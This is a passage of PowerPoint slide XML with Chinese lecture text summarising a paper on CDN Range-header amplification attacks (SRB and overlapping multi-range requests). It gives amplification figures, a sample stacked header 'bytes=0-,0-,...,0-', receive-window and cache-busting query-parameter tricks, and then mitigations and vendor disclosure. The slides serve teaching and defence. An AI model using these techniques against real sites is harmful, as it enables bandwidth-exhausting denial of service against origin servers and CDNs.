              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的情况，根据不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>放大倍数从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>724</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>倍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>~1707</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>倍不等（除了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>KeyCDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>724</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>倍，其余</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>都在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>倍以上）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>举个例子：上图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1+4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也就是攻击者与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>间的交互报文大小为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>600</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节，而请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件大小为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，那么此时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2+3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与源站交互的报文大小约等于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1MB/600B,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>放大倍数接近</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1700</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>倍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>理论上，使用删除型策略的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的放大倍数可以随着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大小无限制增大，论文中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>25MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时最大放大倍数可达</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4W+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>倍（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Memcached</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的反射放大攻击最大在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>倍左右）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>而使用扩展型策略的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，可能会存在一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求大小的上限，令放大倍数存在一定的限制，不过最次的情况下最大放大倍数也接近了万倍。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时配合一些手法，令每次对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问都不命中缓存并回源进行数据读取，从而造成稳定的放大攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>持续消耗源站的带宽资源。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>论文中的攻击测试结果：目标资源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，客户端消耗带宽小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>500Kbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，可使目前源站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1000Mbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的带宽接近占满。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL3N6X21tYml6X3BuZy9yZG5pYnYwaG1KQnBJUHdybXZwOGptU0NQVUJianl1ZGlhU2ljUjc2ZEpzSmhkSTNZbFFFNjBrWXhBZnluQ2ZWQndLY2N0cFNFYk1rYXM0NTYwTEZHa0p2dy82NDA?x-oss-process=image/format,png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7C878E-893C-4789-BCBF-9AD9C73652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7884" y="3957566"/>
            <a:ext cx="10277475" cy="2847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0708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2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</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71945" y="1019782"/>
            <a:ext cx="11050249" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>该方法使用多重范围的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头，堆叠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>范围数量（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>bytes=0-,0-,...,0-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>支持的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的数量越大放大倍数越大，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>间消耗的流量等于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>倍的访问文件大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，适用于前置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FCDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）采取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>懒惰型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>策略，并且后置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BCDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）不检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>范围是否重叠，就返回分块的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>响应；的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>组合情况。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同时在客户端处，设置较小的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>接收窗口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，并及时断开连接，使得接收的数据尽量小。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>该方法可获得源站文件大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>50-6500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的流量放大，大量消耗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FCDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BCDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的网络资源。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>论文中给了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结合，一共</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>种组合的可利用情况，相对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SRB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来说利用难度较大，一般很少有使用多层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的情况。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>该方法无法直接威胁到源站。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL3N6X21tYml6X3BuZy9yZG5pYnYwaG1KQnBJUHdybXZwOGptU0NQVUJianl1ZGlhWDg1dUcyWmlhRnZoTmljNDhVT0V2aWJqQVlNZ3ZxUDBVeU1McmZMT3JLNklZVXpUaWNkcG1hQjRvQS82NDA?x-oss-process=image/format,png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17661EC5-908D-4D9A-B66E-F0ECFD3EB0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3208" y="3652705"/>
            <a:ext cx="7365583" cy="2761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3720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2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</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71945" y="1019782"/>
            <a:ext cx="11050249" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>论文中最后给出了针对不同角色的解决方案，并且已经向已测试的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>余家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>厂商进行了问题通报：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器侧：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>增强本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防御能力 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果接入了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，判断是否存在上述问题。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>侧：修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求的回源策略，从删除型的扩展型，并且扩展较小的范围（比如在原范围基础上扩展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8KB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，这样不会浪费太多资源）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议侧：修改相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标准，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RangeAMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>纳入到考虑范围中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们还发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在静态资源后面加参数，使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的缓存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MISS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是一种常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cache MISS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>手法。（在这种情况下，访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/test.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>test.jpg?xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会被当做访问了不同的静态资源文件）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所以，如果确认不需要参数，可直接在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上开启忽略参数进行缓存，避免静态资源重复回源，造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SRB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方法的放大攻击。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17698929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2.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>社交网络安全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1131376" y="1319132"/>
            <a:ext cx="5539591" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>社交网络是指可以让人们彼此连接，分享信息的公共服务平台。可以发布照片、视频等内容与朋友沟通生活状态。主要的社交网络服务平台包括国内的微博、微信、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>等，还有国外的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Linkedln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>等。国内外主流的社交网站有着庞大的用户群体，非常受欢迎。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>由于社交网络拥有天然的人物链接属性，因此在加入人物本身固有的属性，就可以轻而易举的分析出用户的更多信息，利用这些信息企业可以做一些商品的推广。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>然而，如果相关社交网络的数据被用于恶意行为，那么造成的后果是不可以估量的。如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>年</a:t>
